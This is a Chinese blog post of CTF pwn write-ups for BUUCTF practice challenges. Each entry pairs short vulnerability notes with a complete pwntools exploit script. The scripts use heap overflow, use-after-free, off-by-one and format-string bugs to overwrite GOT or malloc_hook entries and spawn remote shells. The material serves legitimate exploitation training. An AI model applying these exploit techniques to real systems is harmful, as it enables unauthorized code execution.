第六周周报

最新推荐文章于 2024-07-23 10:25:52 发布
最新推荐文章于 2024-07-23 10:25:52 发布
阅读量627 收藏 6
点赞数 10
文章标签: ubuntu python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79525044/article/details/139235009
版权
babyfengshui_33c3_2016

32位开启了NX和canary保护

add函数会先malloc一个我们自定义的函堆块,再malloc一个0x80的堆块。

漏洞出现在edit函数,,这里的检查方式有问题,它将存放name的堆地址与我们自定义的堆地址比较,如果我们通过堆分配将两个堆分开,就可以制造堆溢出了。

先add三个chunk

add(0x80,b'a',b'a')
add(0x80,b'a',b'a')
add(0x8,b'a',b'/bin/sh\x00')

再free(0),这样被free掉的两个chunk就会合并,

我们再add一个0x100的chunk,堆管理器就会从top chunk中重新划出一个新的0x80的chunk来,这样add出来的0x100的chunk就可以堆溢出了。

随后就是堆溢出的利用了,先将指向chunk1的指针改为free_got,show获得libc_base,再将freegot中的内容改为system。

exp

from pwn import *
from LibcSearcher import *
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'i386')

#p = process('./pwn')
p = remote('node4.buuoj.cn', 26501)
elf = ELF('./pwn')
libc = ELF('buu/libc-2.23.so')

def add(size, name, text):
p.sendlineafter(b'Action: ', '0')
p.sendlineafter(b'size of description: ', str(size))
p.sendlineafter(b'name: ', name)
p.sendlineafter(b'text length: ', str(len(text)))
p.sendafter(b'text: ', text)
def free(index):
p.sendlineafter(b'Action: ', '1')
p.sendlineafter(b'index: ', str(index))
def dump(index):
p.sendlineafter(b'Action: ', '2')
p.sendlineafter(b'index: ', str(index))
def edit(index, lens, text):
p.sendlineafter(b'Action: ', '3')
p.sendlineafter(b'index: ', str(index))
p.sendlineafter(b'text length: ', str(lens))
p.sendafter(b'text: ', text)
def exit():
p.sendlineafter(b'Action: ', '4')

add(0x80, b'a', b'a')
add(0x80, b'b', b'b')
add(0x10, b'/bin/sh\x00', b'/bin/sh\x00')
free(0)
add(0x100, b'd', b'd')
edit(3, 0x19c, b'\x00'*0x198 + p32(elf.got['puts']))

dump(1)
p.recvuntil(b'description: ')
puts_addr = u32(p.recv(4))
print('puts_addr =>', hex(puts_addr))
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']

edit(3, 0x19c, b'\x00'*0x198 + p32(elf.got['free']))

edit(1, 0x4, p32(system))

free(2)

p.interactive()
0ctf_2017_babyheap

64位保护全开。

存在堆溢出漏洞。跟第二页一道题一模一样。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('0ctf_2017_babyheap')
p = remote('node5.buuoj.cn',25360)
elf=ELF('0ctf_2017_babyheap')
libc=ELF('./libcs/buu/libc-2.2364.so')


def add(size):
    sla(b'Command: ', '1')
    sla(b'Size: ',str(size))
    
def show(index):
    sla(b'Command: ', '4')
    sla(b'Index: ', str(index))
    
def free(index):
    sla(b'Command: ', '3')
    sla(b'Index: ', str(index))

def edit(index,text):
    sla(b'Command: ','2')
    sla(b'Index: ',str(index))
    sla(b'Size: ',str(len(text)))
    sla(b'Content: ',text)

#gdb.attach(p)
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4

free(1)
free(2)

payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
edit(0,payload)

payload=p64(0)*3+p64(0x21)
edit(3,payload)

add(0x10)#1
add(0x10)#2

payload = p64(0)*3+p64(0x91)
edit(3,payload)
add(0x20)#5

free(4)
show(2)
#pause()

libc_base=l64()-libc.sym['__malloc_hook']-88-0x10
print(hex(libc_base))
one_gadget=libc_base+0x4526a

add(0x60)#4
free(4)
payload=p64(libc_base+0x3c4aed)
edit(2,payload)

add(0x60)
add(0x60)

payload=b'a'*0x13+p64(one_gadget)
edit(6,payload)

add(0x10)
inter()
hitcon2014_stkof

64位,开启了NX和canary。

edit函数存在堆溢出

没有show函数。

我们可以通过将free函数改为putsplt来泄露libcbase。

通过堆溢出来将bss段上保存堆指针的地方改为fakechunk,从而实现修改free_got。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('stkof')
p = remote('node5.buuoj.cn',25748)
elf=ELF('stkof')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    p.sendline(b'1')
    p.sendline(str(size))
    p.recvuntil("OK\n")

def free(index):
     p.sendline(b'3')
     p.sendline(str(index).encode())

def edit(index,context):
    p.sendline(str(2))
    p.sendline(str(index).encode())
    p.sendline(str(len(context)))
    p.send(context)
    p.recvuntil("OK\n")
    

fake_chunk=0x6020cd
#gdb.attach(p)
add(0x10)
add(0x10)
add(0x10)
add(0x60)
add(0x60)
add(0x10)
add(0x10)
#pause()
free(4)
free(5)

payload=p64(0)*3+p64(0x71)+p64(0)*13+p64(0x71)+p64(fake_chunk)
edit(3,payload)

add(0x60)
add(0x60)

payload=b'a'*0x6b+p64(elf.got['free'])+p64(elf.got['puts'])
edit(9,payload)

edit(1, p64(elf.plt['puts']))

free(2)

libc_base=l64()-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']

edit(7, b'/bin/sh\x00')
edit(1, p64(system))
free(7)

inter()
mrctf2020_shellcode_revenge

64位,开启了pie和Full RELRO

 需要写入不存在被限制字符的shellcode。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('mrctf2020_shellcode_revenge')
p = remote('node5.buuoj.cn',25126)
elf=ELF('mrctf2020_shellcode_revenge')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    p.sendline(b'1')
    p.sendline(str(size))
    p.recvuntil("OK\n")

def free(index):
     p.sendline(b'3')
     p.sendline(str(index).encode())

def edit(index,context):
    p.sendline(str(2))
    p.sendline(str(index).encode())
    p.sendline(str(len(context)))
    p.send(context)
    p.recvuntil("OK\n")
    
payload=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

p.send(payload)
p.interactive()
pwnable_hacknote

32位开启了canary和NX保护。

add函数先malloc一个0x8大小的chunk,将puts函数的地址和自定义chunk的地址存放在其中,再malloc自定义的chunk。

没有将指针置零,存在uaf漏洞。

先通过uaf漏洞泄露libc_base。

申请两个chunk并释放,再申请一个0x8大小的chunk。这样就可以对show函数put的内容进行改写了。

以这种方式先泄露libc_base,再调用system。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('hacknote (1)')
p = remote('node5.buuoj.cn',25467)
elf=ELF('hacknote (1)')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice :', '1')
    sla(b'Note size :', str(size))
    sa(b'Content :', content)

def free(idx):
    sla(b'choice :',b'2')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

#gdb.attach(p)
add(0x20, b'a')
add(0x20, b'assssss')
 
free(0)
free(1)
add(0x8,p32(0x804862b)+p32(elf.got['free']))

show(0)
libc_base=l32()-libc.sym['free']
system=libc_base+libc.sym['system']
print(hex(libc_base))

free(2)
add(0x8,p32(system)+b';sh\x00')
 
show(0)

inter()
wdb_2018_2nd_easyfmt

32位NX保护。

明显的格式化字符串漏洞。

无限循环,可以多次修改。

先泄露libc_base。

再将printfgot修改为system即可。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('wdb_2018_2nd_easyfmt')
p = remote('node5.buuoj.cn',27896)
elf=ELF('wdb_2018_2nd_easyfmt')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice :', '1')
    sla(b'Note size :', str(size))
    sa(b'Content :', content)

def free(idx):
    sla(b'choice :',b'2')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

payload=b'%7$s'+p32(elf.got['puts'])
sla(b'repeater?\n',payload)
libc_base=l32()-libc.sym['puts']
system=libc_base+libc.sym['system']
print(hex(libc_base))

payload = fmtstr_payload(6,{elf.got['printf']:system})
s(payload)
s("/bin/sh\x00")
inter()
roarctf_2019_easy_pwn

64位保护全开。

edit函数存在off by one漏洞。

利用off by one漏洞创造一个fakechunk,将他free掉再malloc回来,这样就可以利用fakechunk控制另一个chunk的内容了,先泄露libc_base。

再通过fastbin attack来修改malloc_hook为one_gadget。

但是由于这里的onegadget都不可使用,所以需要利用realloc来修改环境变量。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('roarctf_2019_easy_pwn')
p = remote('node5.buuoj.cn',25157)
elf=ELF('roarctf_2019_easy_pwn')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    sla(b'choice: ',b'1')
    sla(b'size: ', str(size))

def edit(idx,size,content):
    sla(b'choice: ',b'2')
    sla(b'index: ', str(idx))
    sla(b'size: ', str(size))
    sla(b'content: ', content)

def free(idx):
    sla(b'choice: ',b'3')
    sla(b'index: ',str(idx))

def show(idx):
    sla(b'choice: ',b'4')
    sla(b'index: ',str(idx))

#gdb.attach(p)
add(0x18)
add(0x10)
add(0x80)
add(0x10)

payload=p64(0)*3+p8(0xb1)
edit(0,0x18+0xa,payload)

free(1)

add(0xa0)
edit(1,0x20,p64(0)*3+p64(0x91))

free(2)
show(1)
libc_base=l64()-88-0x10-libc.sym['__malloc_hook']
print(hex(libc_base))
realloc_hook = libc_base + libc.sym['realloc']
one_gadget=libc_base+0x4526a

add(0x60)
free(2)

fake_chunk=libc.sym['__malloc_hook']+libc_base-0x23
edit(1,0x28,p64(0)*3+p64(0x71)+p64(fake_chunk))
print(hex(fake_chunk))

add(0x60)
add(0x60)

edit(4,0x1b,b'a'*0xb+p64(one_gadget)+p64(realloc_hook))
#pause()
add(0x10)
inter()
npuctf_2020_easyheap

64位开启了NX和canary保护。

create函数先malloc一个0x10的chunk,再malloc自定义的chunk。自定义chunk大小只能是0x18或0x38。

edit函数存在off by one漏洞。

通过off by one漏洞将自定义1的chunk跟0x10的chunk倒过来,并修改chunk的大小,使其可以覆盖0x10的chunk。随后将指向堆的指针修改为指向freegot,然后写入systemplt。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('npuctf_2020_easyheap')
p = remote('node5.buuoj.cn',29524)
elf=ELF('npuctf_2020_easyheap')
libc=ELF('./libcs/buu/libc-2.2764.so')

def add(size,content):
    sla(b'choice :',b'1')
    sla(b'only) : ', str(size))
    sla(b'Content:',content)

def edit(idx,content):
    sla(b'choice :',b'2')
    sla(b'Index :', str(idx))
    sla(b'Content: ', content)

def free(idx):
    sla(b'choice :',b'4')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

#gdb.attach(p)

add(0x18,b'a')
add(0x18,b'a')
add(0x18,b'a')

payload=b'/bin/sh\x00'+p64(0)*2+p8(0x41)
edit(0,payload)

free(1)

add(0x38,b'a')
edit(1,p64(0)*3+p64(0x21)+p64(0x38)+p64(elf.got['free']))

show(1)
libc_base=l64()-libc.sym['free']
system=libc_base+libc.sym['system']

edit(1,p64(system))
free(0)
#pause()
inter()
hitcontraining_bamboobox

64位开启了NX和canary保护。

存在后门函数。

载入程序会先创建一个0x10的chunk。

edit函数存在堆溢出漏洞。

后门函数给出的地址是错误的,我们使用fastbin attack,来getshell。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('bamboobox')
p = remote('node5.buuoj.cn',29792)
elf=ELF('bamboobox')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size, content):
    sla(b'Your choice:', '2')
    sla(b'Please enter the length of item name:', str(size))
    sa(b'Please enter the name of item:', content)

def show():
    sla(b'Your choice:', '1')

def edit(index, content):
    sla(b'Your choice:', '3')
    sla(b'Please enter the index of item:', str(index))
    sla(b'Please enter the length of item name:', str(len(content)))
    sa(b'Please enter the new name of the item:', content)

def free(index):
    sla(b'Your choice:', '4')
    sla(b'Please enter the index of item:', str(index))

#gdb.attach(p)
add(0x10, b'a')
add(0x60, b'b')
add(0x60, b'c')
add(0x10, b'd')
#pause()
free(2)
free(1)

fake_chunk = 0x60209d

payload=p64(0)*3 + p64(0x71)+p64(fake_chunk)
edit(0, payload)

add(0x60, b'a')
add(0x60, b'b')

edit(2, b'a'*0x1b + p64(elf.got['atoi']))
#pause()
show()
atoi= u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base=atoi-libc.sym['atoi']
print(hex(libc_base))
system =libc_base+ libc.sym['system']

edit(0, p64(system))

sla(b'Your choice:', '/bin/sh\x00')
inter()
inndy_echo

32位,NX保护。

存在格式化字符串漏洞,不存在栈溢出。

已经给出了system函数,不需要泄露libc_base。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('./echo')
p=remote('node5.buuoj.cn',28256)
elf=ELF('./echo')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice:', '2')
    sla(b'Please enter the length of item name:', str(size))
    sa(b'Please enter the name of item:', content)

def show():
    sla(b'Your choice:', '1')

def edit(index, content):
    sla(b'Your choice:', '3')
    sla(b'Please enter the index of item:', str(index))
    sla(b'Please enter the length of item name:', str(len(content)))
    sa(b'Please enter the new name of the item:', content)

def free(index):
    sla(b'Your choice:', '4')
    sla(b'Please enter the index of item:', str(index))

#gdb.attach(p)

payload=fmtstr_payload(7, {elf.got['printf']:elf.sym['system']})
sl(payload)
 
sl(b'/bin/sh\x00')

inter()
hitcontraining_unlink

跟hitcontraining_bamboobox一模一样。

wustctf2020_easyfast

64位NX和canary保护。

存在uaf漏洞。

edit最多写八字节数据。

最多add四次。

将0x602090改为0即可获得shell。

利用uaf漏洞来将0x602090申请出来。

题目将这里设置为50,所以为了绕过检查,我们add时add0x40大小。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('wustctf2020_easyfast')
p = remote('node5.buuoj.cn',25103)
elf=ELF('wustctf2020_easyfast')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    sla('choice>\n','1')
    sla('size>\n',str(size))
def free(index):
    sla('choice>\n','2')
    sla('index>\n',str(index))
def edit(index,content):
    sla('choice>\n','3')
    sla('index>\n',str(index))
    s(content)


#gdb.attach(p)

add(0x40)
add(0x40)
#pause()
free(0)
free(1)
 
fake_chunk=0x602080
edit(1,p64(fake_chunk))
add(0x40)
#pause()
add(0x40)
#pause()
edit(3, p64(0))
sla(b'choice>\n', '4')

inter()
cmcc_pwnme1

32位保护全关。

存在后门函数。

无限循环。

存在栈溢出。

后门函数无效,flag没有存放在那里。

使用ret2libc。

exp

from pwn import *
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'i386')
 

p = remote('node5.buuoj.cn',25552)
elf = ELF('./pwnme1')
libc = ELF('./libcs/buu/libc-2.2332.so')
 
s = 0x8048913

p.sendlineafter(b'>> 6. Exit    \n', b'5')
payload = b'a'*0xa4 + b'stop' + p32(elf.plt['puts']) + p32(elf.sym['main']) +  p32(elf.got['puts'])
p.sendlineafter(b'Please input the name of fruit:', payload)
p.recvline()
puts = u32(p.recv(4))
libcbase = puts - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))
 

p.sendlineafter(b'>> 6. Exit    \n', b'5')
payload = b'a'*0xa8 + p32(system) + p32(elf.sym['main']) + p32(binsh)
p.sendlineafter(b'Please input the name of fruit:', payload)
p.interactive()
actf_2019_babyheap

64位,Full RELRO开启了NX保护和canary。

add函数先malloc一个0x10大小的chunk,再add自定义chunk。

存在/bin/sh字符串。

存在uaf漏洞。

已经给出了system函数。

利用uaf漏洞

修改调用system('/bin/sh')

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('ACTF_2019_babyheap')
p = remote('node5.buuoj.cn',25106)
elf=ELF('ACTF_2019_babyheap')
libc=ELF('./libcs/buu/libc-2.2764.so')

def add(size, content):
    sla(b'Your choice: ', '1')
    sla(b'Please input size: \n', str(size))
    sl(b'Please input content: \n', content)
def free(index):
    sla(b'Your choice: ', '2')
    sla(b'Please input list index: \n', str(index))
def show(index):
    sla(b'Your choice: ', '3')
    sla(b'Please input list index: \n', str(index))
 
add(0x20, b'a')
add(0x20, b'a')

free(0)
free(1)

add(0x10, p64(0x602010) + p64(elf.sym['system']))

show(0)
 
inter()

拓䜣
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java开发周报_java第六周周报
weixin_39943678的博客
02-16 1489
前言本周是学习java的第六周,把容器大部分内容学完了。参考教程:本周学习要点:1.Map中的HashMap和TreeMap区别不大,效率上使用HashMap,需要用到排序时使用TreeMap。2.TreeMap是典型的红黑二叉树的实现。3.TreeMap会按照key递增的方式排序,在使用自己定义的类时需要实现comparable接口并重写CompareTo方法。4.HashMap和HashTab...
创新实训第六周周报
hu15144354443的博客
05-29 385
生成一篇日报/周报</p><p @click="assign('撰写一篇邮件/演讲稿')">撰写一篇邮件/演讲稿</p><p @click="assign('写一篇方案报告')">写一篇方案报告</p><p @click="assign('代码报错解决')">代码报错解决</p><p @click="assign('文章润色')">文章润色
数据挖掘第六周周报
qq_32019707的博客
11-02 189
